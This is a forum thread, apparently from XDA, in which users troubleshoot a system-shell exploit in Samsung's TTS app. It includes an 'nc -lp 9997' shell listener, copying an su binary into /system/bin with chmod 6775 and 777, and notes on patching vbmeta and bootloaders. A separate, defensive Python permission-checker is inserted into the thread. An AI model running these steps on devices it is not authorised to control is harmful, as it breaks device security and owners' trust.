How To Guide System Shell Exploit - ALL Samsung Mobile Devices NO BL UNLOCK REQUIRED.


adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
I have not removed eToken crap...

My stupid Bootloader sboot.bin ONLY checks text string...

If "he" finds mrk text string... then I can flash with Odin...

If FACtory text string fac...

Then blocked... by sboot.bin Exynos Bootloader...

But again...

My Bootloader sboot.bin is unlocked... AND vbmeta.img is patched by Magisk...
Or you can do it manually... because only 1 Byte...

This is no Rocket Science to change text... from same size...


Also my GW4 SM-R870 and SM-R875F allow Bootloader downgrade...

So full Rollback is possible... including ALL files and partitions... with Odin + USB cable.

IMHO Phones especially modern Samsung Phones are better protected... so sboot.bin downgrade is maybe close to impossible... if full Knox crap activated...

Best Regards
 
Dec 20, 2010
10
3
Hey all, I've been trying this thing for a few days and made sure to download the current 1/20 bundle

I tried the following

Used the simple mode and get the blank screen and no prompt.

Tried doing it the manual way and was successful but still was met with a blank prompt when running
nc -lp 9997 in one terminal and am start -n com.samsung.SMT/.gui.DownloadList in the other. I still get hung up...


I restarted USB and WiFi debugging and authorized both my laptop and wifi for USB debugging
Reinstalled lang.poc
Tried to set my wifi to STATIC and IP Address 192.168.2.225
Followed the instructions and made sure CHMOD 777 on adb shell /data/local/tmp/samsungTTSVULN2.apk

I was hoping I could get into system to make a full backup of some Apps on my phone, particularly the Dragalia Lost 11GB folder. Would I be able to do that with this?

Phone is S22U bought from Samsung direct with T-Mobile SIM if that helps any
 

subevilx

Member
Dec 30, 2022
31
8
I have not removed eToken crap...

My stupid Bootloader sboot.bin ONLY checks text string...

If "he" finds mrk text string... then I can flash with Odin...

If FACtory text string fac...

Then blocked... by sboot.bin Exynos Bootloader...

But again...

My Bootloader sboot.bin is unlocked... AND vbmeta.img is patched by Magisk...
Or you can do it manually... because only 1 Byte...

This is no Rocket Science to change text... from same size...


Also my GW4 SM-R870 and SM-R875F allow Bootloader downgrade...

So full Rollback is possible... including ALL files and partitions... with Odin + USB cable.

IMHO Phones especially modern Samsung Phones are better protected... so sboot.bin downgrade is maybe close to impossible... if full Knox crap activated...

Best Regards
I tried this. I was able to flash my boot.img and recovery, but I got stuck on download mode, then decided to do it for the whole file, then I started getting secure boot fail for all files except boot and recovery. I did this on a combination file; any way to fix the secure check?
 

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
@subevilx
Now we come closer to Rocket Science... because damn Crypto...

Other files also different secured... Minimum by Samsung signing stuff...

For instance I have no idea how to disable Security check in:
Code:
vbmeta_system.img

Similar to vbmeta.img... which holds Security info for boot.img and recovery.img

Then I could flash modified super.img... in theory...

Maybe somebody has an idea. As my Bootloader has no Fastboot Support...
Only FACtory sboot.bin has Fastboot...

Best Regards
 

Moshe fasten

Member
Feb 8, 2015
8
2
Someone may have already asked this question: but with this exploit, is there a way to enable call recording without changing to a different CSC? and if so how?
 

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
Memo to me...

Will try this week, what happens if I copy su into:
Code:
/system/bin

Sorry, the test device is GW4 SM-R875F already rooted with Magisk 25.2...
Bootloader sboot.bin is unlocked
vbmeta.img is patched by Magisk
boot.img is patched by Magisk

I have read AND write access...
Thanx to Magisk

Step 1.

Code:
freshul:/ $ su
freshul:/ # cd /system/bin
freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 06:26 su -> ./magisk

For later to make the chmod Command correct...
For my tiny Windows Brain I need a chmod calculator like this...


I have already copied the working su Binary.... ehm... from Magisk...

Step 2.

I have to prepare few things...

But IMHO test 1 is writing boot.img and vbmeta.img from Stock Firmware... via Odin.

To check if my SM-R875F detect the modified super.img...

Only as stupid test...

Best Regards

Edit 1.

First attempts... to make it easier for me, as su as symlink already exists... renamed into su2

Code:
D:\Android\adb>adb push su2 /sdcard
su2: 1 file pushed, 0 skipped. 2.8 MB/s (154452 bytes in 0.052s)

D:\Android\adb>adb shell
freshul:/ $ su
freshul:/ # cd /sdcard
freshul:/sdcard # ls -a1l su
-rw------- 1 u0_a118 u0_a118 154452 2023-01-22 22:16 su
freshul:/sdcard # ls -a1l su2
-rw------- 1 u0_a118 u0_a118 154452 2023-01-22 22:17 su2
freshul:/sdcard # mount -vo remount,rw /
try '/dev/block/dm-0' type 'ext4' on '/'
freshul:/sdcard # cd /system/bin
freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 06:26 su -> ./magisk
freshul:/system/bin # ls -a1l su2
ls: su2: No such file or directory
1|freshul:/system/bin # cd /sdcard
freshul:/sdcard # cp su2 /system/bin
freshul:/sdcard # cd /system/bin
freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 06:26 su -> ./magisk
freshul:/system/bin # ls -a1l su2
-rw------- 1 root root 154452 2023-01-25 06:58 su2
freshul:/system/bin # chmod 6775 su2
freshul:/system/bin # ls -a1l su2
-rwsrwsr-x 1 root root 154452 2023-01-25 06:58 su2
freshul:/system/bin #

Okidoki... lazy me took chmod command from other Thread...

Need correct chmod for su2 to have same like su shows...

Edit 2.

Stupid mewinfanboy... It could be from the symlink... so maybe chmod 777 is enough... hopefully...

Code:
freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 06:26 su -> ./magisk
freshul:/system/bin # ls -a1l su2
-rw------- 1 root root 154452 2023-01-25 06:58 su2
freshul:/system/bin # chmod 6775 su2
freshul:/system/bin # ls -a1l su2
-rwsrwsr-x 1 root root 154452 2023-01-25 06:58 su2
freshul:/system/bin # chmod 777 su2
freshul:/system/bin # ls -a1l su2
-rwxrwxrwx 1 root root 154452 2023-01-25 06:58 su2

Now will Factory Reset and boot... and try su without Magisk APK...


Edit 3.

Maybe I shot myself in my own knee by playing before with a few reboot Commands...
like reb..t secure

Because this funny Icon with x.... and I was not able to Factory Reset from menu... but from Recovery...
Puh... need to check how I can remove this...

Code:
D:\Android\adb>adb shell
freshul:/ $ su2
/system/bin/sh: su2: inaccessible or not found
127|freshul:/ $ cd /system/bin
freshul:/system/bin $ ls -a1l su2
ls: su2: No such file or directory
1|freshul:/system/bin $ ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 07:16 su -> ./magisk
freshul:/system/bin $ su
Permission denied

Edit 4.

Interesting, the symlink already exists... so it's not the Magisk APK that generates this...

Edit 5.

Okidoki... also after full activating Magisk with APK my su2 is missing...
Code:
freshul:/ $ su
Permission denied
13|freshul:/ $ su
freshul:/ # cd /system/bin
freshul:/system/bin # ls -a1l su2
ls: su2: No such file or directory
1|freshul:/system/bin # ls -a1l su
lrwxrwxrwx 1 root root 8 2023-01-25 07:37 su -> ./magisk

So I need to undo my stupid things from before... to get rid of secure blabla...

I hope Bootloader lock unlock do this for me...

Edit 6.

Need some sleep... Watch needs battery charging...

At the moment I have flashed back Original vbmeta.img and boot.img.. did Bootloader lock unlock a few times...
Now only Bootloader is unlocked... Original boot.img... and only patched:
Code:
vbmeta.img

Watch is starting... and accepts my "modified" super.img... it's not a dream because I have inserted APKs and deleted a few files...
Will try next days to understand what happens to su2...
 

Attachments: Screenshot_20230125_071940_sysui.png
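The post above asks for a "chmod calculator" and wants su2 to end up with the same mode `ls` shows for su. As an added example (not code from the thread or from Magisk), the following converts ls mode strings such as `-rwsrwsr-x` to the octal chmod argument and back, parses `ls -a1l` lines, and flags what a reviewer would flag about chmod 777 / chmod 6775 on a binary in /system/bin. The sample listing is constructed to match the shape of the output quoted in the post.

```python
import re
import stat

# Constructed sample lines, shaped like the `ls -a1l` output quoted in the post above.
SAMPLE_LS = """\
lrwxrwxrwx 1 root root 8 2023-01-25 06:26 su -> ./magisk
-rw------- 1 root root 154452 2023-01-25 06:58 su2
-rwsrwsr-x 1 root root 154452 2023-01-25 06:58 su2
-rwxrwxrwx 1 root root 154452 2023-01-25 06:58 su2
drwxrws--x 5 media_rw media_rw 3452 2023-01-25 08:04 Android
"""

LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+(?P<links>\d+)\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+(?P<size>\d+)\s+(?P<date>\d{4}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2})\s+(?P<name>.+)$"
)
TYPE_BITS = {"-": stat.S_IFREG, "d": stat.S_IFDIR, "l": stat.S_IFLNK, "c": stat.S_IFCHR,
             "b": stat.S_IFBLK, "p": stat.S_IFIFO, "s": stat.S_IFSOCK}


def mode_string_to_int(mode_str: str) -> int:
    """Turn a 10-char ls mode string such as '-rwsrwsr-x' into its numeric mode (0o6775)."""
    if len(mode_str) != 10 or mode_str[0] not in TYPE_BITS:
        raise ValueError(f"not an ls mode string: {mode_str!r}")
    mode = 0
    for i, ch in enumerate(mode_str[1:]):
        triad, pos = divmod(i, 3)          # triad: 0 user, 1 group, 2 other; pos: 0 r, 1 w, 2 x
        bit = 1 << (8 - i)                 # rwxrwxrwx maps to bits 8..0
        if ch == "-":
            continue
        if pos == 2 and ch in "sStT":
            # s/S in the user or group slot is setuid/setgid, t/T in the other slot is sticky.
            # Upper case means the special bit is set without the execute bit under it.
            mode |= (stat.S_ISUID, stat.S_ISGID, stat.S_ISVTX)[triad]
            if ch in "st":
                mode |= bit
        elif ch == "rwx"[pos]:
            mode |= bit
        else:
            raise ValueError(f"unexpected {ch!r} at position {i + 1} in {mode_str!r}")
    return mode


def mode_string_to_octal(mode_str: str) -> str:
    """'-rwsrwsr-x' -> '6775', the argument you would pass to chmod to reproduce it."""
    return f"{mode_string_to_int(mode_str):04o}"


def octal_to_mode_string(octal: str, type_char: str = "-") -> str:
    """'6775' -> '-rwsrwsr-x'; the reverse direction, via the standard library."""
    return stat.filemode(int(octal, 8) | TYPE_BITS[type_char])


def parse_ls_line(line: str) -> dict:
    """Parse one `ls -l` line into a dict; a symlink target is split off into 'target'."""
    m = LS_LINE.match(line.strip())
    if not m:
        raise ValueError(f"unparsed ls line: {line!r}")
    entry = m.groupdict()
    entry["size"] = int(entry["size"])
    entry["type"] = entry["mode"][0]
    entry["octal"] = mode_string_to_octal(entry["mode"])
    name, _, target = entry["name"].partition(" -> ")
    entry["name"], entry["target"] = name, target or None
    return entry


def permission_findings(entry: dict) -> list:
    """Defender-side checks on one parsed entry: what a reviewer would flag about
    a binary dropped into /system/bin with chmod 777 or chmod 6775."""
    findings = []
    mode = mode_string_to_int(entry["mode"])
    if entry["type"] == "l":
        # chmod follows symlinks, so the lrwxrwxrwx shown for a link says nothing about the target.
        findings.append("symlink: mode shown is not the target's mode")
        return findings
    if mode & stat.S_ISUID:
        findings.append(f"setuid bit set, owner {entry['owner']}")
    if mode & stat.S_ISGID:
        findings.append(f"setgid bit set, group {entry['group']}")
    if mode & stat.S_IWOTH and mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append("world-writable executable: any app could replace it")
    return findings


def review_listing(listing: str) -> dict:
    """Map each entry's mode string to (octal, findings), e.g. for SAMPLE_LS."""
    out = {}
    for line in listing.splitlines():
        if line.strip():
            e = parse_ls_line(line)
            out[e["mode"]] = (e["octal"], permission_findings(e))
    return out


if __name__ == "__main__":
    for mode_str, (octal, findings) in review_listing(SAMPLE_LS).items():
        print(f"{mode_str}  chmod {octal}  {'; '.join(findings) or 'ok'}")
```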

javadahut

Member
Aug 26, 2015
38
17
Could someone confirm having similar issue?

Failure [INSTALL_FAILED_BLOCKED_CROSS_DOWN: INSTALL_FAILED_BLOCKED_CROSS_DOWN] ROLLBACK FAILED

I tried manually installing the SMT recommended version, but after adb uninstall, uninstalling updates and resetting, it doesn't work; when I try to manually install it throws an error, though after a few moments I get the voice data menu, and as far as I get is lang.poc, after that nothing else either.
Confirmed, I have the same issue.

Android 13
Nov 2022 Security Patch
Default SMT system app v3.3.02.75
 

mohitgalaxy3

Senior Member
Apr 18, 2011
1,944
539
34
Kuala Lumpur
Samsung Galaxy S21 Ultra
So trying to find how I can further improve network issues or find the difference between the global and Korean model. Found that it doesn't support secondary 4G/LTE, though not sure if the info is correct or not.
 

Attachments: Screenshot_20230125_191710_Chrome.jpg, Screenshot_20230125_191820_Chrome.jpg

profi_fahrer

Senior Member
Jul 19, 2016
297
118
Wels
Sadly, I can't get it working. It basically stops after opening the two shells with the commands. The easy method is unable to access the needed DLLs, even with Windows Defender turned completely off.

Is the "K0mraids_POC.apk" supposed to show a blank screen on startup, or should it load something else?
 

Attachments: Screenshot_20230125_185721_langpoc.png

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
Somebody forked... whatever this means... and created exploit.sh...

Ehmmm... I am too blind to find this Shell Script.

Can somebody please help to find this?

Thanx in advance.

Best Regards

Edit 1.

Oh great... EXE AND Avira crashed on my old Notebook...

Edit 2.

The good news... for me.

SM-R860 tested also with "new" Firmware GWA3 successfully.

"""Security crap""" from January 2023...

So in theory also working for GW5... but here nobody confirmed yet...
 

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
Please help... need a few ideas about folders... from where I can execute Binaries...

Here again a stupid test with su renamed as su2... I can chmod 777 in the /cache folder but not execute...

In /cache I can also mkdir... from system...

adb push su2 to /sdcard I did from the other adb Window... as normal user...

This output only from system shell...

Code:
/system/bin/sh: can't find tty fd: No such device or address
/system/bin/sh: warning: won't have full job control
:/ $ ls
ls: .: Permission denied
1|:/ $ cd /data/local/tmp
/system/bin/sh: <stdin>[2]: cd: /data/local/tmp: Permission denied
2|:/ $ cd /data/local/
:/data/local $ ls
ls: .: Permission denied
1|:/data/local $ mkdir test1
mkdir: 'test1': Permission denied
1|:/data/local $ cd ..
:/data $ mkdir test1
mkdir: 'test1': Permission denied
1|:/data $ whoami
system
:/data $ cd ..
:/ $ ls
ls: .: Permission denied
1|:/ $ fd -h
/system/bin/sh: <stdin>[11]: fd: inaccessible or not found
127|:/ $ df -h
Filesystem                                          Size  Used Avail Use% Mounted on
/dev/block/dm-0                                     3.4G  3.3G   99M  98% /
tmpfs                                               646M  1.2M  645M   1% /dev
tmpfs                                               646M     0  646M   0% /mnt
/dev/block/dm-1                                      84M   81M  1.3M  99% /vendor
/dev/block/dm-2                                     169M  169M     0 100% /product
/dev/block/dm-3                                     3.9M  984K  2.9M  25% /odm
/dev/block/platform/10500000.dwmmc0/by-name/prism   581M  179M  390M  32% /prism
/dev/block/platform/10500000.dwmmc0/by-name/optics   39M  500K   37M   2% /optics
tmpfs                                               646M     0  646M   0% /apex
/dev/block/by-name/omr                               16M   24K   15M   1% /omr
/dev/block/platform/10500000.dwmmc0/by-name/cache   193M  6.0M  183M   4% /cache
/dev/block/platform/10500000.dwmmc0/by-name/sec_efs 3.8M  1.3M  2.3M  37% /efs
/dev/fuse                                           8.3G  701M  7.5G   9% /storage/emulated
:/ $ cd /sdcard
:/sdcard $ ls
Alarms
Android
Audiobooks
DCIM
Documents
Download
Movies
Music
Notifications
Pictures
Podcasts
Ringtones
:/sdcard $ ls -a1l
total 36
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Alarms
drwxrws--x 5 media_rw media_rw 3452 2023-01-25 08:04 Android
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Audiobooks
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 DCIM
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Documents
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Download
drwx------ 3 u0_a117  u0_a117  3452 2023-01-25 08:04 Movies
drwxrwxr-x 4 media_rw media_rw 3452 2023-01-25 08:04 Music
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Notifications
drwx------ 3 u0_a117  u0_a117  3452 2023-01-25 08:04 Pictures
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Podcasts
drwx------ 2 u0_a117  u0_a117  3452 2023-01-25 08:04 Ringtones
:/sdcard $ ls -a1l
total 188
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Alarms
drwxrws--x 5 media_rw media_rw   3452 2023-01-25 08:04 Android
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Audiobooks
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 DCIM
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Documents
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Download
drwx------ 3 u0_a117  u0_a117    3452 2023-01-25 08:04 Movies
drwxrwxr-x 4 media_rw media_rw   3452 2023-01-25 08:04 Music
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Notifications
drwx------ 3 u0_a117  u0_a117    3452 2023-01-25 08:04 Pictures
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Podcasts
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Ringtones
-rw------- 1 u0_a117  u0_a117  154452 2023-01-22 22:17 su2
:/sdcard $ chmod 777 su2
:/sdcard $ ls -a1l
total 188
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Alarms
drwxrws--x 5 media_rw media_rw   3452 2023-01-25 08:04 Android
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Audiobooks
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 DCIM
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Documents
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Download
drwx------ 3 u0_a117  u0_a117    3452 2023-01-25 08:04 Movies
drwxrwxr-x 4 media_rw media_rw   3452 2023-01-25 08:04 Music
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Notifications
drwx------ 3 u0_a117  u0_a117    3452 2023-01-25 08:04 Pictures
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Podcasts
drwx------ 2 u0_a117  u0_a117    3452 2023-01-25 08:04 Ringtones
-rw------- 1 u0_a117  u0_a117  154452 2023-01-22 22:17 su2
:/sdcard $ ./su2
/system/bin/sh: <stdin>[18]: ./su2: can't execute: Permission denied
126|:/sdcard $ ./su2
/system/bin/sh: <stdin>[18]: ./su2: can't execute: Permission denied
126|:/sdcard $ cd /cache
:/cache $ ls -a1l
total 48
drwxrwx---  7 system cache   4096 2023-01-25 08:02 .
drwxr-xr-x 27 root   root    4096 2008-12-31 15:00 ..
d?????????  ? ?      ?          ?                ? backup
drwx------  2 system system  4096 2023-01-25 08:02 backup_stage
drwxrwx---  2 system system  4096 2023-01-25 08:02 fota
drwxrwx---  2 root   root   16384 2023-01-25 08:02 lost+found
drwxrwx---  2 system cache   4096 2023-01-26 01:52 recovery
:/cache $ mkdir test1
:/cache $ ls -a1l
total 52
drwxrwx---  8 system cache   4096 2023-01-26 02:10 .
drwxr-xr-x 27 root   root    4096 2008-12-31 15:00 ..
d?????????  ? ?      ?          ?                ? backup
drwx------  2 system system  4096 2023-01-25 08:02 backup_stage
drwxrwx---  2 system system  4096 2023-01-25 08:02 fota
drwxrwx---  2 root   root   16384 2023-01-25 08:02 lost+found
drwxrwx---  2 system cache   4096 2023-01-26 01:52 recovery
drwx------  2 system system  4096 2023-01-26 02:10 test1
:/cache $ cd /sdcard
:/sdcard $ cp su2 /cache
:/sdcard $ cd /cache
:/cache $ ls -a1l su2
-rw------- 1 system system 154452 2023-01-26 02:11 su2
:/cache $ chmod 777 su2
:/cache $ ls -a1l su2
-rwxrwxrwx 1 system system 154452 2023-01-26 02:11 su2
:/cache $ ./su2
/system/bin/sh: <stdin>[29]: ./su2: can't execute: Permission denied
126|:/cache $ su2
/system/bin/sh: <stdin>[30]: su2: inaccessible or not found
127|:/cache $ /cache/su2
/system/bin/sh: <stdin>[31]: /cache/su2: can't execute: Permission denied


Maybe other useful Binaries are possible to run... or some *.sh shell scripts...

Thanx for every idea...

If we can not access /system/bin... then maybe we can Copy and Paste to another path and run...

Who knows....

Best Regards

Edit 1.

Google search...

Code:
/data/bin

Hmmm... seems it does not exist on my device... I can not mkdir bin in /data

Edit 2.

From ADB Window...
Code:
freshul:/sdcard $ ls
Alarms  Android  Audiobooks  DCIM  Documents  Download  Movies  Music  Notifications  Pictures  Podcasts  Ringtones  su2
freshul:/sdcard $ cp su2 /data/local/tmp
freshul:/sdcard $ cd /data/local/tmp
freshul:/data/local/tmp $ ls -a1l
total 15758
drwxrwx--x 2 shell shell     3452 2023-01-26 02:37 .
drwxr-x--x 4 root  root      3452 2023-01-25 08:02 ..
-rw-rw-rw- 1 shell shell 15955101 2023-01-18 17:08 samsungTTSVULN2.apk
-rw------- 1 shell shell   154452 2023-01-26 02:37 su2
freshul:/data/local/tmp $ chmod 777 su2
freshul:/data/local/tmp $ ls -a1l
total 15758
drwxrwx--x 2 shell shell     3452 2023-01-26 02:37 .
drwxr-x--x 4 root  root      3452 2023-01-25 08:02 ..
-rw-rw-rw- 1 shell shell 15955101 2023-01-18 17:08 samsungTTSVULN2.apk
-rwxrwxrwx 1 shell shell   154452 2023-01-26 02:37 su2

Edit 3.

Hmmmmmmmmmm... from ADB Window...
Code:
freshul:/data/local/tmp $ /data/local/tmp/su2
su2: applet not found
1|freshul:/data/local/tmp $ /data/local/tmp/su2 -version
su2: applet not found
1|freshul:/data/local/tmp $ /data/local/tmp/su2 -h
su2: applet not found
1|freshul:/data/local/tmp $ /data/local/tmp/su2 --help
su2: applet not found

This su is taken from Magisk 25.2 ... will check some easier Binary...

Edit 4.

After finding this...

Tried via system shell...
Code:
:/data/user/0 $ ls
android
com.acr.shellterminalemulator
com.android.backupconfirm
com.android.bluetooth
com.android.captiveportallogin
com.android.carrierconfig
com.android.cellbroadcastreceiver
com.android.certinstaller
com.android.companiondevicemanager
com.android.cts.ctsshim
com.android.cts.priv.ctsshim
com.android.dynsystem
com.android.hotspot2.osulogin
com.android.inputdevices
com.android.keychain
com.android.localtransport
com.android.location.fused
com.android.managedprovisioning
com.android.mms.service
com.android.modulemetadata
com.android.mtp
com.android.networkstack.inprocess
com.android.networkstack.permissionconfig
com.android.networkstack.tethering.inprocess
com.android.nfc
com.android.phone
com.android.providers.blockednumber
com.android.providers.calendar
com.android.providers.downloads
com.android.providers.media
com.android.providers.media.module
com.android.providers.settings
com.android.providers.telephony
com.android.providers.userdictionary
com.android.se
com.android.server.telecom
com.android.shell
com.android.soundpicker
com.android.statementservice
com.android.vending
com.android.wallpaperbackup
com.android.wearable.resources
com.android.wifi.resources
com.corproxy.files
com.google.android.apps.maps
com.google.android.apps.messaging
com.google.android.apps.wearable.retailattractloop
com.google.android.apps.wearable.settings
com.google.android.apps.wearable.systemui
com.google.android.apps.work.clouddpc
com.google.android.clockwork.oemsetup
com.google.android.ext.services
com.google.android.ext.shared
com.google.android.gms
com.google.android.gsf
com.google.android.marvin.talkback
com.google.android.networkstack.tethering.overlay
com.google.android.overlay.modules.cellbroadcastreceiver
com.google.android.packageinstaller
com.google.android.partnersetup
com.google.android.permissioncontroller
com.google.android.tts
com.google.android.wearable.ambient
com.google.android.wearable.app
com.google.android.wearable.app.overlay.refsysui.default
com.google.android.wearable.assistant
com.google.android.wearable.batteryservices
com.google.android.wearable.frameworkpackagestubs
com.google.android.wearable.healthservices
com.google.android.wearable.overlay.home.merlot
com.monotype.android.font.chococooky
com.monotype.android.font.cooljazz
com.monotype.android.font.foundation
com.monotype.android.font.rosemary
com.monotype.android.font.samsungone
com.samsung.SMT
com.samsung.SMT.lang.poc
com.samsung.aasaservice
com.samsung.accessibility
com.samsung.advancedcallservice
com.samsung.advp.imssettings
com.samsung.android.aircommandmanager
com.samsung.android.app.contacts
com.samsung.android.app.esimkeystring
com.samsung.android.app.reminder
com.samsung.android.app.routines
com.samsung.android.app.telephonyui
com.samsung.android.apps.wearable.recent
com.samsung.android.batterysavingsettings
com.samsung.android.bixby.agent
com.samsung.android.bixby.wakeup
com.samsung.android.calendar
com.samsung.android.cidmanager
com.samsung.android.clientconnection
com.samsung.android.dialer
com.samsung.android.dqagent
com.samsung.android.gallery.watch
com.samsung.android.honeyboard
com.samsung.android.incallui
com.samsung.android.location.locproxy
com.samsung.android.mcfds
com.samsung.android.mdecservice
com.samsung.android.mediacontroller
com.samsung.android.messaging
com.samsung.android.networkstack
com.samsung.android.providers.contacts
com.samsung.android.providers.factory
com.samsung.android.samsungnetworklocation
com.samsung.android.samsungpay.gear
com.samsung.android.scloud
com.samsung.android.sdk.handwriting.watch
com.samsung.android.service.health
com.samsung.android.shealthmonitor
com.samsung.android.smartgesture
com.samsung.android.stextclassifier
com.samsung.android.storage.watchstoragemanager
com.samsung.android.video.wearable
com.samsung.android.watch.alarm
com.samsung.android.watch.cameracontroller
com.samsung.android.watch.compass
com.samsung.android.watch.findmyphone
com.samsung.android.watch.findmywatch
com.samsung.android.watch.flashlight
com.samsung.android.watch.runestone.app
com.samsung.android.watch.safety_assistance
com.samsung.android.watch.screencapture
com.samsung.android.watch.stf
com.samsung.android.watch.stopwatch
com.samsung.android.watch.timer
com.samsung.android.watch.watchface.analogmodular
com.samsung.android.watch.watchface.analoguefont
com.samsung.android.watch.watchface.animal
com.samsung.android.watch.watchface.aremoji
com.samsung.android.watch.watchface.basicclock
com.samsung.android.watch.watchface.basicdashboard
com.samsung.android.watch.watchface.bespoke
com.samsung.android.watch.watchface.bitmoji
com.samsung.android.watch.watchface.companionhelper
com.samsung.android.watch.watchface.digitalfont
com.samsung.android.watch.watchface.digitalmodular
com.samsung.android.watch.watchface.dualwatch
com.samsung.android.watch.watchface.emergency
com.samsung.android.watch.watchface.endangeredanimal
com.samsung.android.watch.watchface.healthmodular
com.samsung.android.watch.watchface.large
com.samsung.android.watch.watchface.livewallpaper
com.samsung.android.watch.watchface.myphoto
com.samsung.android.watch.watchface.mystyle
com.samsung.android.watch.watchface.premiumanalog
com.samsung.android.watch.watchface.simpleanalogue
com.samsung.android.watch.watchface.simpleclassic
com.samsung.android.watch.watchface.simplecomplication
com.samsung.android.watch.watchface.superfiction
com.samsung.android.watch.watchface.tickingsound
com.samsung.android.watch.watchface.together
com.samsung.android.watch.watchface.typography
com.samsung.android.watch.watchface.weather
com.samsung.android.watch.weather
com.samsung.android.watch.worldclock
com.samsung.android.wcs.extension
com.samsung.android.wear.blockednumber
com.samsung.android.wear.calculator
com.samsung.android.wear.musictransfer
com.samsung.android.wear.shealth
com.samsung.android.wear.voicerecorder
com.samsung.android.wearable.music
com.samsung.android.wearable.samsungaccount
com.samsung.android.wearable.setupwizard
com.samsung.android.wearable.sysui
com.samsung.euicc
com.samsung.euicc.wmservice
com.samsung.packageinstalleroverlay
com.samsung.sec.android.application.csc
com.samsung.sree.classic
com.samsung.sree.countdown
com.samsung.sree.digital
com.samsung.sree.spin
com.samsung.wear.contacts.sync
com.sds.emm.cloud.knox.samsung
com.sec.android.RilServiceModeApp
com.sec.android.app.bluetoothtest
com.sec.android.app.factorykeystring
com.sec.android.app.factorymode
com.sec.android.app.hwmoduletest
com.sec.android.app.parser
com.sec.android.app.personalization
com.sec.android.app.servicemodeapp
com.sec.android.app.wlantest
com.sec.android.diagmonagent
com.sec.android.easyMover
com.sec.android.sdhms
com.sec.android.soagent
com.sec.app.RilErrorNotifier
com.sec.automation
com.sec.bcservice
com.sec.factory
com.sec.hiddenmenu
com.sec.imsservice
com.sec.location.nfwlocationprivacy
com.sec.modem.settings
com.sec.phone
com.sec.usbsettings
com.sem.factoryapp
com.skms.android.agent
com.wssyncmldm
de.szalkowski.activitylauncher
:/data/user/0 $

:/data/user/0 $ cd /sdcard
:/sdcard $ cp su2 /data/user/0
cp: /data/user/0/su2: Permission denied
 

subevilx

Member
Dec 30, 2022
31
8
@subevilx
Now we come closer to Rocket Science... because damn Crypto...

Other files also different secured... Minimum by Samsung signing stuff...

For instance I have no idea how to disable Security check in:
Code:
vbmeta_system.img

Similar to vbmeta.img... which holds Security info for boot.img and recovery.img

Then I could flash modified super.img... in theory...

Maybe somebody has an idea. As my Bootloader has no Fastboot Support...
Only FACtory sboot.bin has Fastboot...

Best Regards

I can't go beyond this. If I change even one bit in a file I'm stuck on file analysis. Any help?
 

mauricio1352

New member
Jan 8, 2015
2
0
Is there any way to contact you? I have an A71 with KG LOCKED; it would be interesting to test some commands on it, to see if I can get KG COMPLETED, just like yours 🙂
 

Tofor

Senior Member
May 18, 2017
52
10
Samsung Galaxy Tab A8
Sorry to bust in here and ask something somewhat off subject. But I was curious how you got the cmds for opening the hidden menus? What do all the numbers at the end stand for? I'm asking because there has always been something that has come up in my list of secret codes for Samsung. Near the end of the list there come some secret codes that are in all caps letters. One such code that is on all my unlockable devices is *#UNLOCKKERNEL#. It's part of the IOT hidden menu, but I can't find any such option inside the hidden menu itself. Curious if it could be executed the same way as you did for the other parts of the IOT Hidden Menu. To me, unlock kernel will either unlock the bootloader, or it will make the kernel debuggable. Either would be awesome. Thanks for any light you can shed on this secret code.
 

Note: this secret code did not appear on my device until I used the system shell to enable the hidden menus.
 

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22
Code:
D:\Android\adb>adb shell
freshul:/ $ su
freshul:/ # mount -vo remount,rw /
try '/dev/block/dm-0' type 'ext4' on '/'
freshul:/ # cd /sdcard
freshul:/sdcard # ls -a1l su2
-rw------- 1 u0_a117 u0_a117 154452 2023-01-22 22:17 su2
freshul:/sdcard # cp su2 /system/bin
freshul:/sdcard # cd /system/bin
freshul:/system/bin # ls -a1l su2
-rw------- 1 root root 154452 2023-01-27 04:21 su2
freshul:/system/bin # chmod 777 su2
freshul:/system/bin # ls -a1l su2
